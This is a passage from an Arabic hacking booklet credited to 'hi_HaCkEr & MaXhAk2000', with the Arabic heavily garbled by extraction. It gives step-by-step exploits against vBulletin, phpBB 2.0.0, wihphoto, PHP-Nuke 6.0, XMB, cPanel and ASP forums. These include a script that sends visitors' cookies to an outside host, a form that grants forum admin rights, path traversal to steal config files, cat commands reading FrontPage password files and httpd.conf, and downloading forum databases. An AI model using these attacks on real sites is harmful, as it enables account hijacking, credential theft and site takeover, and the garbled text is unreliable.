php ﻗﻊ ﯾﺪﻋﻢ ﺎرﻓﻊاﻟﻤﻠ ﻒﻟﻤﻮ-٢
ﺎﺟﻌ ﻞاﻟ ﻀ ﺤﯿﺔ ﯾ ﻀﻐﻂ ﻋﻠﻰ ﻫﺬا ﺎﻟﻠﯿﻨﻚ-٣
member2.php?s=[Session]&action=viewsubscription&perpage=[Script
Code]
[script code]ﺘﺒﺪا ل ﻮاﺳ
ﺑﻬﺬا
<ﻣﻜﺎن ﺎﻟﻤﻠ ﻒاﻟﺬيﺗﻢﺗ ﺤﻤﯿﻠﻪScript>location='Http://[
]?Action=Log&Cookie='+(document.cookie);</Script>
ﺈذﻫﺐأﻟﻰ ﻫﺬااﻟﻌﻨﻮان4-
?Action=List ﺎﻟﻤﻠ ﻒاﻟﺬيﺗﻢﺗ ﺤﻤﯿﻠﻪ/ﻣﻜﺎنhttp://%20
....
٢ ٣٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$
ـﻮ ل
ـ
ــ
ــ
ـﻘ
ــ
ـ
ـﻨ
ــ
ﻣ
$$$$$$$$$
phpbb 2.0.0
vb ـ
وﻫﻮ ﺷﺒﯿﻪﺑﺎﻟ
ﺘﺒ ﺮﺗﺎااﻓﻪ
وﻫﻮ ﺳﻬ ﻞ ﺟﺪاﺑ ﻞ ﯾﻌ
ﯾﺎ ﷲ ﺳﻤﻮﺑﺎ ﷲ
PhpBB2
admin_ug_auth.php ﻓﻲ ﻣﻠ ﻒ
:اﻟﻮ ﺻ ﻒ
ﺘﺪى
ﯾﻤﻜﻨﻚ ﻣﻦ ﺧﻼ ل ﻫﺬهاﻟﺜﻐ ﺮةأنﺗﺄ ﺧﺬﺗﺼ ﺮﯾﺢﺑﺄنﺗﻜﻮن ﻣﺪﯾ ﺮ واﻟﻤﺸ ﺮ فاﻟﻌﺎم ﻋﻠﻰاﻟﻤﻨ
ﺘﻰ ﺷﺌ ﺖ
ﺘ ﺤﻜﻢ ﻣوﺑﺬﻟﻚ ﯾﻤﻜﻨﻚاﻟﺪ ﺧﻮ لاﻟﻰﻟﻮ ﺣﺔاﻟ
:اﻷﺻﺪار
٢٫٠٫٠
ﺘﺪىﺘﺠ ﺮﺑﺔاﻟﺜﻐ ﺮةاوﻻ ﺳﺠ ﻞﺑﺎﻟﻤﻨﻟ
ﺘﺪى ﺘﻚﺑﺎﻟﻤﻨﻗﻢ ﻋ ﻀﻮﯾ ﺛﻢا ﺣﻔﻆ ر
ﺘﺢاﻟﻤﻔﻜ ﺮة واﻧﺴ ﺦ ﻣﺎﯾﻠﻲاﻟﯿﻬﺎﺑﻌﺪﻫﺎاﻓ
<html>
<head>
<head/>
<body>
method="post" form>
action="http://www.domain_name/board_directory/admin/admin_ug_au
<th.php"
<select name="userlevel"> Level: User
<option/>Administrator<value="admin" option>
<select/><option/>User<value="user" option>
<name="private[1]" value="0" input type="hidden">
<value="0" input type="hidden" name="moderator[1]">
<value="user" input type="hidden" name="mode">
<input type="hidden" name="adv" value="">
<input type="text" name="u" size="5"> Number: User
<value="Submit" name="submit" input type="submit">
٢ ٣٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
><form/
><body/
><html/
ﺘﺪا ذا
ﺷﻮوﻓﻮواﻟﻤﻨ
http://forums.xos.ca/
ﻗﯿﻪ...
ﻗﻊاﻟﺒﺎا
ﺗﺪﻣ ﺮ واﻟ ﺤﻤﺪ ﷲ ﻋﻘﺒﺎ لاﻟﻤﻮا
٢ ٤٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐMaXhAk2000:
$$$$$$$$$$$$$$$$
ﺘﻮﻓ ﺮهﻓﻲاﻏﻠﺐ ﺘﻤﺪ ﻋﻠﻰاﻟﺒ ﺤﺚاﻟﻌﺸﻮاﺋﻲ وﻫﻲ ﻣ ﺘﺒ ﺮ ﻫﺬهاﻟﺜﻐ ﺮة ﺟﻤﯿﻠﻪ وﻣﯿﺴ ﺮه وﺳﻬﻠﻪ ﺟﺪا وﻫﻲﺗﻌ ﺗﻌ
ﺘﻬﺪﻓﻪ... ﻗﻊاﻟﻤﺴ اﻟﻤﻮا
ﺑﺴﻢا ﷲ ﻧﺒﺪأ،،،
ﺘﻨﺎاﻷﺳﺎﺳﯿﺔﻓﻲ ﻫﺬهاﻟﺜﻐ ﺮهاﻟﺒ ﺤﺚﻗﻲ ﺟﻮﺟ ﻞاوﻓﻲأي ﻣ ﺤ ﺮكﺑ ﺤﺚا ﺧ ﺮ ﻣﻬﻤ
ﻗﻊاﻟﻤﺼﺎﺑﻪﺑﻬﺎ !!! ﺘ ﺞﻟﻨﺎ ﻋﺪدﻛﺒﯿﯿﯿﯿﯿﯿﯿ ﺮ ﻣﻦاﻟﻤﻮاﺳﻮ ف ﻧﺒ ﺤﺚ ﻋﻦﻛﻠﻤﻪ وﺳﯿﻨ
ﺘ ﺮأي وا ﺣﺪ ﻣﻨﻬﺎ
ﻗﻊﻛﺜﯿ ﺮا ﺧﺘﺐ " "powered by wihphotoﺳﻮ ف ﯾﺠﺪﻟﻨﺎ ﻣﻮا اذﻫﺐاﻟﻰ ﺟﻮﺟ ﻞ واﻛ
ﺑﻌﺪ ذﻟﻚ ﻋﻠﯿﻚ
ﻗﻊ http://www .*****.com/wihphoto/index.php ﺘﺎﻟﻲ ﻣﻦ ﻋﻨﻮاناﻟﻤﻮ ﺑ ﺤﺬ فاﻟ
ﺳﻮ ف ﻧﻘﻮمﺑ ﺤﺬ فﻫﺬهاﻟﻜﻠﻤﻪ index.phpوﻧﺴﺒﺪﻟﻬﺎﺑﻬﺬااﻟﻌﻨﻮان
sendphoto.php?album=..&pic=config.inc.php
ﺘﺐﺑ ﺮﯾﺪ ﻣﺜﻼﺳﻮ فﺗﻈﻬ ﺮﻟﻨﺎ ﺻﻔ ﺤﻪ ﯾﻄﻠﺐﻓﯿﻬﺎاد ﺧﺎ لاﻟﺒ ﺮﯾﺪاﻟﺬيﺗ ﺮﯾﺪارﺳﺎ ل ﻣﻠ ﻒاﻟﻜﻮﻧﻔ ﺞﻟﻪ ..اﻛ
maxhak2000@hotmail.com
ﺘﺠﺪﻓﯿﻬﺎ ﻣﻠ ﻒ ﻣ ﺮﻓ ﻖا ﺿﻐﻂ ﻋﻠﯿﻪ وﺷﻐﻠﻪ ###را ح ﯾﺠﯿﻚﻛﻼامﻛﺜﯿ ﺮ ﺘﻈ ﺮ ذواﻧﻲ ﺳﻮ فﺗﺼﻠﻚ رﺳﺎﻟﻪ ﺳ اﻧ
ﺘﻔﯿﺪ ﻣﻨﻪاﻛﺜ ﺮ ﺷﻲ ءﻫﻮ ﻫﺬا اﻟﺸﻲ ءاﻟﻲ را ح ﻧﺴ
٢ ٤١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﻗﻲ ﻋﻠﯿﻨﺎ د ﺣﯿﻦ ﻧﺪ ﺧ ﻞ ﻋﻠﻰﻗﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ تاو ﻧﺪ ﺧ ﻞ ﻋﻠﻰ ﺘﺎﺟﻬﺎﻛﻠﻬﺎاﻟﻲﺑﺎ اوﻛﻲاﻵن ﺟﺒﻨﺎاﻟﻤﻌﻠﻮﻣﺎ تاﻟﻲ ﻧ ﺤ
ﺘﺎﻟﻲ::ﺘﺒﻊاﻟﯿﻨﻚاﻟ اﻟﺼﻮرﻟﻠﺪ ﺧﻮ ل ﻋﻠﻰاﻟﺼﻮر ﻧ
http://www.*****.com/wihphoto/admin.php
وﻧ ﻀﻊاﻟﺒﺎﺳﻮرد ﺣ ﻖ ﻣﺪﯾ ﺮﻗﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ ت وﻧﻌﺪ لﻓﻲاﻟﺼﻮر زي ﻣﺎﻧﺒﻐﻰ ....
ﻗﻪﻛﺎﻣﻼ ﻫﻨﺎكﺑﻌ ﺾاﻟﻄ ﺮ قﻟﻔﻌ ﻞ ذﻟﻚ ﺘ ﺮا
ﻗﻊﻛﺎﻣﻼاوا ﺧ ﺘﻼكاﻟﻤﻮ ﻫﻨﺎكﺑﻌ ﺾاﻷﺷﺨﺎ صاﻟﺬﯾﻦ ﯾ ﺮدﯾﺪوناﻣ
:::
ﺘﺨﺪم ﻣﻮ ﺣ ﻖاﻟﺼﻮر أوﻻ/اد ﺧ ﻞ ﻋﻦ ﻃ ﺮﯾ ﻖاﻷ فﺗﻲﺑﻲ FTPوﻧﺪ ﺧ ﻞاﻟﺒﺎﺳﻮرد ﺣ ﻖاﻟﻤﺪﯾ ﺮ واﺳﻢاﻟﻤﺴ
ﺑﻌ ﺾاﻷ ﺣﯿﺎنﺗﻨﺠﺢاذاﻛﺎناﻷﺳﻢ واﻟﺒﺎﺳﻮرد ﻣﻄﺎﺑ ﻖﻟﻠﺒﺎﺳﻮرد ﺣ ﻖ ﻣﻠ ﻒاﻟﻜﻮﻧﻔ ﺞ.
ﺘﻄﯿﻊ ﻣﻦ ﻗﻊ ﻋﻦ ﻃ ﺮﯾﻘﻬﺎ ﻫﻨﺎكﺑ ﺮاﻣ ﺞﺗﺴ ﺘﻼكاﻟﻤﻮ ﺛﺎﻧﯿﺎ /ﻋﻦ ﻃ ﺮﯾ ﻖاﻟﺪ ﺧﻮ لﻟﻘﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ ت واﻟﻌﺐﻓﯿﻬﺎ واﻣ
ﺧﻼﻟﻬﺎاﻟﺪ ﺧﻮ ل ﻋﻠﻰﻗﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ ت ﻣﺜ ﻞﺑ ﺮﻧﺎﻣ ﺞ MySQL Frontوﻫﻮﺑ ﺮﻧﺎﻣ ﺞ ﺟﯿﺪأو ﻋﻦ ﻃ ﺮﯾ ﻖ
اﻷﻛﺴ ﺲ وﻏﯿ ﺮﻫﺎ ﻣﻦاﻟﻄ ﺮﯾ ﻖ واﻟﺒ ﺮاﻣ ﺞ ....
٢ ٤٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$
اﻟﻜﺎﺗﺐ :اﯾﺴ ﺮ
$$$$$$$$
ﺘﻤ ﻞ ﻮاﻟﺠﺎﻓﺎﺑﺪ ل
ﺘﯿﺢﻟﻚﺗﻨﻔﯿﺬاﻛﻮاداﻟﻬ
ﻗﻮﻟﻜﻢ ﻋﻠﯿﻬﺎ ..اﻟﺜﻐ ﺮه ديﺗ
ﻓﯿﻪﺛﻐ ﺮهﻓﻲا ل php nukeﺣﺒﯿ ﺖا
ﻣﻜﺎناﻟﺼﻮرهاﻟﺸﺨﺼﯿﻪ .......
ﺘﻌﻮد -
ﺘﻤﻨﻲﺑﺎﻛﺜ ﺮاﻻﻟﻔﺎظاﺑﺎ ﺣﻪ -ﺑ ﺲ ﻋﺎدياﻧﺎ ﻣ
ﺎﻧﺎ ﻋﺎر فاﻧﻜﻢاو ل ﻣﺎﺗﻘ ﺮوااﻟﺴﻄ ﺮ ﺎﻻو لاﻛﯿﺪاﻏﻠﺒﻜﻢ ﺣﯿﺸ
ﺘﻤ ﻞ و ﺟﺎﻓﺎﺑﺪ لاﻟﺼﻮرهاﻟﺸﺨﺼﯿﻪ ؟؟؟!!!!ﺑ ﺲ و ﯾﻘﻮ لاﯾﻪ ﺪهﺑﺎهﻫﻮ ﻣﺪ ﺧﻠﻨﺎ ﻫﻨﺎ ﻋﺸﺎن ﯾﻘﻮﻟﻨﺎﺗﻨﻔﯿﺬاﻛﻮاد ﻫ
؟؟؟!!!اﻣﺎ ﻋﺒﯿﻂاوي !!!
ﺘ ﺮﻣﻪﻟﻢﺗﯿﺠﻲﺗﻌ ﺮ ضﺛﻐ ﺮه (
ﺘﻲاﻟﻤ ﺤ
ﻗﻊ ﺎﻟﺴﯿﻜﯿﻮرﯾ
ﺘﺎﻟﻲ ) :ﺳﺎ ﺣﺎو لاﻧﻲاﻋﻤ ﻞ زي ﻣﻮا
ﺎﻟﻤﻬﻢاناﻟﺜﻐ ﺮهﻛﺎﻟ
ﻗ ﻞ ﻣﻨﻬﺎ
PHP Nuke versionh 6.0ﻮاﻻ
ﺘﺨﺪام :
ﺎﻻﺳ
ﺘﻄﺎ ع
ﻋﻨﺪﺋﺬﺗﻘﻮماﻟﻤﺠﻠﻪﺑﻮ ﺿﻊاﺳﻢاﻟﺼﻮرهﻓﻲاﻟﺪاﺗﺎﺑﯿﺰ ..وﻟﻜﻨﻬﺎ ﻻﺗﻘﻮمﺑﻮ ﺿﻊايﻛﻮداياﻧﻪاذااﺳ
ﺘﯿﺎراﻟﺼﻮرهاﻟﺸﺨﺼﯿﻪاﻟﻰ ﺘﻄﺎ عان ﯾﻐﯿ ﺮ ﺻﻨﺪو قا ﺧاي ﯾﻮزران ﯾ ﺤﺼ ﻞ ﻋﻠﻰﻛﻮدﻓﻮرماﻟﻤﺠﻠﻪ واﺳ
ﺘﻤ ﻞاﻟﻠﻲ ﻫﻮه ﻋﺎﯾﺰه !!!!ﺘﺐﻛﻮداﻟﻬ ﺘﻘﺪاﻧﻪ ﻣﻤﻜﻦان ﯾﻜ
ﺻﻨﺪو ق textﻋﺎدي ..اذناﻋ
ﺎﻻﻛﺴﺒﻠﻮﯾ ﺖ:
ﺘﺴﺠﯿ ﻞﻓﻲاﻟﻤﺠﻠﻪ واﻟﺪ ﺧﻮ لﺑﻌﺪ ذﻟﻚ واﻟﺬﻫﺎباﻟﻰ ﺻﻔ ﺤﻪ Your Accountﻮ ﻣﻨﻬﺎ ﺎوﻻ ﻋﻠﯿﻚ نﺗﻘﻮمﺑﺎﻟ
اﻟﺬﻫﺎب ﺎﻟﻰ ﺻﻔ ﺤﻪ Your Infoﺑﻌﺪ ذﻟﻚ ﻋﻠﯿﻚﺑﺎﻇﻬﺎر ﺳﻮرسﻛﻮداﻟﺼﻔ ﺤﻪ ﻣﻦ ﺧﻼ ل view sourceﻮ
ﺎﻟﺒ ﺤﺚ ﻋﻦﻛﻠﻤﻪuid
٢ ٤٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
">
ﺘﻬﻲﺑﺎﻟﻌﻼﻣﻪ
ﻮ ﻣﻤﻜﻦ ﯾﻨ
<b
ﻗﻢاﻻي دي وﺑﻌﺪﯾﻦ ﺿﻊﺑﻌﺪﻛﺪهاﺳﻢ ﺎﻟﯿﻮزر و ر... ﺘﻰ ﻻﺗﺠﺪاي ﻣﺸﺎﻛ ﻞﻓﻲاﻟﻜﻮد ﻋﻨﺪاﻟﻌ ﺮ ض
ﺣ
!!!! ﻮﻛﺪهاﻟﻜﻮدﺗﻢﺗﺸﻐﯿﻠﻪ.. ﺎﻟﺨﺎﺻﻪﺑﻚYour Account ﺳﻮ فﺗﺠﺪ ﻧﻔﺴﻚﻓﻲ ﺻﻔ ﺤﻪsubmit
:ﺘﺒﻪ ﻣﺜﻼ
ﻣﺜﺎ لﻟﻠﻲ ﻣﻤﻜﻦﺗﻜ
"><h1>TESTING</h1><b
٢ ٤٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺧﻠﻲﺑﺎﻟﻚانﻓﯿﻪ ﻣﺴﺎﻓﻪﺑﻌﺪاﻟﻌﻼﻣﻪ
"<b
ﺘ ﺮ ....
ﻗﺼﻰ ﺣﺪﻟﻠﻜﻮداﻟﻠﻲ ﻣﻤﻜﻦاﻧﻚﺗﺸﻐﻠﻪ ﻫﻮ ٣٠ﻛ ﺮاﻛ ﺎ
ﻗﻮﻟﻪاﻧﻚ ﻣﻤﻜﻦﺗﻨﻔﺬﺛﻐ ﺮا ت xssﺎواي ﺣﺎﺟﻪاﻧ ﺖ ﻣ ﺶ ﻋﺎر فﺗﻨﻔﺬﻫﺎﺑﺴﺒﺐاﻏﻼ قﻛﻮد ﺎﻟﻠﻲاﻧﺎﻛﻨ ﺖ ﻋﺎﯾﺰا
ﺘﻤ ﻞاﯾﺎه =(ﻟﻤﺰﯾﺪ ﻣﻦاﻟﻤﻌﻠﻮﻣﺎ ت راﺟﻊاﻟﺪرس ﻫﺬاﻛﻤﺜﺎ لﻟﯿ ﺲاﻛﺜ ﺮ ؟؟...اﻟﻬ
٢ ٤٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$
ﺣﺰماﻟﻈﺎﻣﻲ:اﻟﻜﺎﺗﺐ
$$$$$$$$$$$$
ﺘﺪﻧﺎﻫﺬهاﻻﯾﺎم ﻋﻠﻰ ( ﻮﻫﻲﺛﻐ ﺮه ﺳﻲﺑﺎﻧ ﻞﻛﻤﺎاﻋBandmin 1.4 ) ﺎﻟﺜﻐ ﺮه ﻫﻲﻓﻲ ﻣﺪﯾ ﺮاﻟﺒﺎﻧﺪوﯾﺚ
... اﻟﻤﺨﺎ ﻃ ﺮاﻟﺠﺪﯾﺪة ﻣﻦ ﺳﻲﺑﺎﻧ ﻞ
ﻗﻊ ﻋﻠﻰاﻟﺨﺎدم ﯾﻤﻜﻦ ﻋﻦ ﻃ ﺮﯾﻘﻪ ﻣﻌ ﺮﻓﺔ ﺟﻤﯿﻊاﻟﻤﻮا... ﻮﻫﺬهاﻟﺒ ﺮﻧﺎﻣ ﺞ ﯾﻌﻄﯿﻚﺗﻔﺎﺻﯿ ﻞ وإ ﺣﺼﺎﺋﯿﺎ ت ﺷﻬ ﺮﯾﺔ
ﺘﺜﻤ ﺮﺑﻄ ﺮ قأ ﺧ ﺮى
ً وﯾﻤﻜﻦأنﺗﺴ أﯾ ﻀﺎ
http://yourdomain.con/bandwidth/
: ﺘﺎﻟﻲ
ﻮ ﻃ ﺮﯾﻘﺔإﻏﻼ قاﻟﺜﻐ ﺮهﻛﺎﻟ
*************************
Notice:
Any Resellers or Dedicated hosts that use cPanel you should be aware
that there is still an exploit people are using to see what domains are
hosted on the server.
If you have cPanel/WHM on your server, just go to your domain and put
Hopefully you http://yourdomain.con/bandwidth//bandwidth/ after it.
will get a “ You don't have permission to access /bandwidth/ on this
server” message or it will ask for a password.
٢ ٤٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
version)” from here you can access the monthly stats with a list of all
domains with over 1MB of transfer.
*************************
ﺘﻬﺎاﻻن
ﻗﻊ ﺎﻏﻠ
ﺘﻢ ذﻛ ﺮﻫﺎﻟﻜﻦاﻏﻠﺐاﻟﻤﻮا
ﺘﻲﻟﻢ ﯾ
اﻣﺎﻓﯿﻮﺟﺪﺛﻐ ﺮةاﻟﺴﻲﺑﺎﻧ ﻞاﻟ
cgi-sys/guestbook.cgi?user=cpanel&template
][=========][
cat /home/XXX/public_html/_vti_pvt/service.pwd
٢ ٤٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
-----------------------
ﻗﯿﻬﺎ ﻣﺸﻔ ﺮه
ﺘﻼا
ﻮﺑﻌﺪ وﺟﻮوداﻟﺒﺎﺳﻮردا ت ﻃﺒﻌﺎﺑ
ﻻﻧﻬﺎ ﻋﺒﺎره ﻋﻦ ﻣﻠﻔﺎ ت service.pwdﻻﻧﻬﺎ ﻣﻠﻔﺎ تاﻟﻔ ﺮوﻧ ﺖﺑﯿ ﺞ
ﻗﻲ: ﺎذا را حﺗﻼ
# -FrontPage-
adshhhhg:T_h1rTAnSmwck
advrsgrent:yTPvsh2SKGI46
# -FrontPage-
sfjhsdlj:KH5xpD5HGFQio
# -FrontPage-
sdfQKG0nPulR5aY
# -FrontPage-
afsdfgrica:7njMXh9/HImTA
# -FrontPage-
aftergsdfsgnoo:wyXqflo6kr7TI
ﺘﺸﻔﯿ ﺮﺘﻔﻚاﻟﺮا حﺗﻠﻘﺎه زيﻛﺬاﻛﺬا ﻋﺎداﻧ ﺖ ﻮﺷﻄﺎرﺗﻚﺑﺒ ﺮﻧﺎﻣ ﺞ ﺟﻮﻫﻦ ذا رﯾﺒ ﺮﺑ
------------------------
اوﻛﻲاﻟ ﺤﯿﻦﺑﯿﺠﻲ وا ﺣﺪ ﻣﻮﺳﻮسﺑﯿﻘﻮ لﻓﻲ ﻧﻔﺴﻪ ﻃﯿﺐاﻧﺎ ﺟﺒ ﺖ ﺎﻟﺒﺎﺳﻮردا ت +اﻟﯿﻮزرا ت
ﻗﻊ ))ﻓﻌﻼاﻟﻮﺳﻮﺳﻪﻟﻬﺎﻓﺎﯾﺪةاﻟﯿﻮﻣﯿﻦﺬي (( ﻛﯿ ﻒاﻋ ﺮ فاﺳﻢاﻟﻤﻮ
ﻗﻮﻟﻚﺗﻌﺎ ل ﺣﺒﯿﺒﻲ ﺎوﻛﻲا
ﺘﺐاﻻﻣ ﺮ ذا
اﻛ
cat /etc/httpd/apache/conf/httpd.conf
٢ ٤٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﻮﻫﺬااﻟﻠﻲ را حﺗﻠﻘﺎه
PHP:
٢ ٤٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐMaXhAk2000 :
$$$$$$$$$$$$$$$$
ﻗﻮ لﺘﺨﺪام ﺧﺎ ﻃﺊﻟﻬﺬهاﻟﻐ ﺮه ﺿﺪا ﺧﻮاﻧﻨﺎاﻟﻌ ﺮب،وا ﷲ ﻋﻠﻰ ﻣﺎا ﺘﻲ ﻣﻦاياﺳ ﺎﻣﺎﺑﻌﺪ )))))))ﻓﺄﻧﺎاﺑ ﺮئ ذﻣ
ﺷﻬﯿﺪ((((((...
ﺑﺴﻢا ﷲ ﻧﺒﺪأ،،،
ﺘﺴﺒ ﺖ ﺷﻬ ﺮه واﺳﻌﻪﻓﻲ ﻣﺠﺎﻟﻬﺎ و ﺣﺎﻟﻬﺎ ﺣﺎ لاﻟﻜﺜﯿ ﺮ ﻣﻦ ﺘﻲاﻛ ﺘﺪﯾﺎ تاﻟ ﺘﺪﯾﺎ ت ﻣﻦ ﻧﻮ ع xmbﻣﻦ ﺎﻟﻤﻨ ﺘﺒ ﺮاﻟﻤﻨ
ﺗﻌ
ﻗﺎ تﻓﻼ ﯾﻮﺟﺪ ﺷﻲ ءﻛﺎﻣ ﻞ ﻋﻠﻰ وﺟﻪاﻷر ضاﻻ ﺎ ﷲ ﺘ ﺮا
ﺘﺪﯾﺎ ت ﻣﻦ وﺟﻮداﻟﺜﻐ ﺮا ت واﻷ ﺧ
اﻷﻧﻮا عاﻷ ﺧ ﺮى ﻣﻦاﻟﻤﻨ
ﻋﺰ وﺟ ﻞ..
ﻮ ﺻ ﻒﻟﻠﺜﻐ ﺮه::
ﺘﺪىاوﺗﻜﻮن
ﺘﺪﯾﺎ ت ﻣﻤﺎ ﯾﻤﻜﻨﻚانﺗﻜﻮناﻟﻤﺪﯾ ﺮ ﻋﻠﻰاﻟﻤﻨ
ﺘﺸﺎ فﺛﻐ ﺮه ﺟﺪﯾﺪهﻓﻲ ﻫﺬااﻟﻨﻮ ع ﻣﻦ ﺎﻟﻤﻨ ﻗﺪﺗﻢاﻛ ﻮ
ﻣﺸ ﺮ فاوياي ﻋ ﻀﻮا ﺧ ﺮ
ﺎﻷﺻﺪاراﻟﻤﺼﺎب:::
XMB 1.6 Magic Lantern Final
٢ ٥٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺎﻟﻲ::
ﺘﺼﺪيﻟﻬﺬهاﻟﺜﻐ ﺮه و ﺣﻠﻬﺎ ﻋﻠﯿﻚﺑﺎﻟ ﻟ
ﺘﺢاﻟﻤﻠ ﻒindex.php 1-ﺎﻓ
ﺘﺎﻟﻲ : 2-ﻮاﺑ ﺤﺚ ﻋﻦاﻟﻜﻮداﻟ
"include "index_add.php
>?
ﺛﻢﻗﻢﺑ ﺤﺬﻓﻪ. 3-
ﺘﺪى.ﻗﻢﺑ ﺤﺬ فاﻟﻤﻠ ﻒ index_log.logﻣﻦ ﻣﺠﻠﺪ ﺎﻟﻤﻨ 4-
=======
ﻃ ﺮﯾﻘﻪا ﺧ ﺮىﻟ ﺤ ﻞ ﻫﺬهاﻟﺜﻐ ﺮه
ﺘﺪىاﻟﻰ ﺎﻷﺻﺪار1.8 ﺘ ﺮﯾﻘﺔاﻟﻤﻨ ﻗﻢﺑ
**************************************************
************************************
ﺘﻬﻰ ﺎﻟﺸ ﺮ ح....،،،ﺎﻧ
٢ ٥١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐHi_HaCkEr :
$$$$$$$$$$$$$$
ﺘ ﺮﻧ ﺖ وﻟﻬﺎ ﻣﯿﺰة
ﻗﻊاﻻﻧ
ﺘﻔﺎﻋﻠﯿﺔﻟﺒ ﺮﻣﺠﺔ ﻣﻮا
ﺘﺒ ﺮ ﻣﻦﻟﻐﺎ تاﻟﺒ ﺮﻣﺠﺔاﻟﺪﯾﻨﺎﻣﯿﻜﯿﺔ ﺎﻟ
ﺘﺼ ﺮﻫﺬهاﻟﻠﻐﺔﺗﻌﺑﺸﻜ ﻞ ﻣﺨ
ﺑﺄناﻟﻜﻮدﻟﻬﺎ ﻣﺨﻔﻲ
ﺛﺔأﻧﻮا ع ﻫﻲ :
ﺘﻤﺪﻗﻮاﻋﺪﺑﯿﺎﻧﺎﺗﻬﺎ ﻋﻠﻰﺛﻼ
ﻮﺗﻌ
sqlserver && sql && M.S Access
ﺘﺪادا واﺳﻢ
ﻮاﻣﺎﻗﺎﻋﺪةﺑﯿﺎﻧﺎ ت ﻣﺎ ﯾﻜ ﺮوﺳﻮﻓ ﺖأﻛﺴ ﺲﻓﺜﻐ ﺮاﺗﻬﺎ ﻣﻦأﺑﺴﻂاﻟﺜﻐ ﺮا تﺑ ﺤﯿﺚ ﺎﻧﻚاذا وﺟﺪ تاﻣ
ﺘﻄﯿﻊﺗ ﺤﻤﯿﻠﻬﺎ ﻋﻠﻰ ﺟﻬﺎزك ﻣﺒﺎﺷ ﺮة ﻮﺗﺼﻔﺢ ﺟﻤﯿﻊاﻟﺒﺎﺳﻮردا تﺑﺴﻬﻮﻟﺔ وﯾﺴ ﺮ ﻗﺎﻋﺪةاﻟﺒﺎﻧﺎ تﻓﻘﻂﻓﺎﻧﻚﺗﺴ
وﺑﺪونﺗﺸﻔﯿ ﺮأﯾ ﻀﺎ .
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
ﻛﯿ ﻒﺗ ﺤﻤ ﻞﻗﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ ت ؟
ﺘﺪاد
ﺘﺐ ﻫﺬااﻻﻣ اﻛ
ﺘﻰ ﯾﻜﻮن ﺣﺠﻢﻗﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ ت ﺻﻐﯿ ﺮ ﺟﺪا
ﺘﺪىﺑﻪ ﻋﺪﯾﺪﻗﻠﯿ ﻞ ﻣﻦاﻟﻤﻮا ﺿﯿﻊ ﺣ ﻮﺑﻌﺪ ذﻟﻚ ﺣﺎو لان ﯾﻜﻮناﻟﻤﻨ
ﺘﺴﻠﯿﻢﺑﺴ ﺮﻋﺔﺘﻄﺒﯿ ﻖ واﻟﻟﻠ
ﺘﺪاد واﺳﻢﻗﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ تﻟﻘﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ ت ﻮﻫﺬا ﻫﻮاﻣ
database/philboard.mdb
ﺘﺪى ﻣﺜ ﻞ ﻗﻊ واﻟﻤﻨﺘﺒﻪﺑﻌﺪاﺳﻢاﻟﻤﻮ ﻮﺗﻜ
http://www .khill.co.uk/forum/database/philboard.mdb
٢ ٥٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺪﯾﺎ ت philboard.asp
ﺘﺪى .ﻓﻜﻤﺎ راﯾﻨﺎان ﻣﻨ
ﻮاﻟ ﺤ ﻞﻟﻬﺬهاﻟﺜﻐ ﺮة /ﻫﻮﺗﻐﯿﯿ ﺮ ﻣ ﺴﺎرﻗﻮاﻋﺪاﻟﺒﯿﺎﻧﺎ تﻟﻜ ﻞ ﻣﻨ
ﺘﺪاد.....ﻗﻮاﻋﺪﺑﯿﺎﻧﺎﺗﻬﺎ ﺟﻤﯿﻌﺎﻟﻬﺎ ﻧﻔ ﺲاﻻﺳﻢ واﻻﻣ
٢ ٥٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐHi_HaCkEr:
$$$$$$$$$$$$$$
ﺘﻰ
ﺘﻮﻓ ﺮﺑﺎﺻﺪارة ١٫١ﻮﺗﺴﻤﺢﻟﻚﺑ ﺮﻓﻊاي ﻣﻠ ﻒاو ﺣ
ﻫﻲﺛﻐ ﺮةﻓﻲﺑ ﺮﻧﺎﻣ ﺞ uploader.phpﻮﻫﻮ ﻣ
ﺘﺎ ت php ﺳﻜ ﺮﺑ
ﺘﻌ ﺮ ض ﻫﺬا ﺎﻻﻋﺪادا ت ﺘﺢاﻟﻤﻠ ﻒ واﺳ open setup.php and edit these optionsﺎﻓ
--------------------------------------------------------------------------------------
$ADMIN[RequirePass] = "Yes"; // Checks to see if upload has a vaild
password
$ADMIN[Password] = "password"; // This is the password if the above
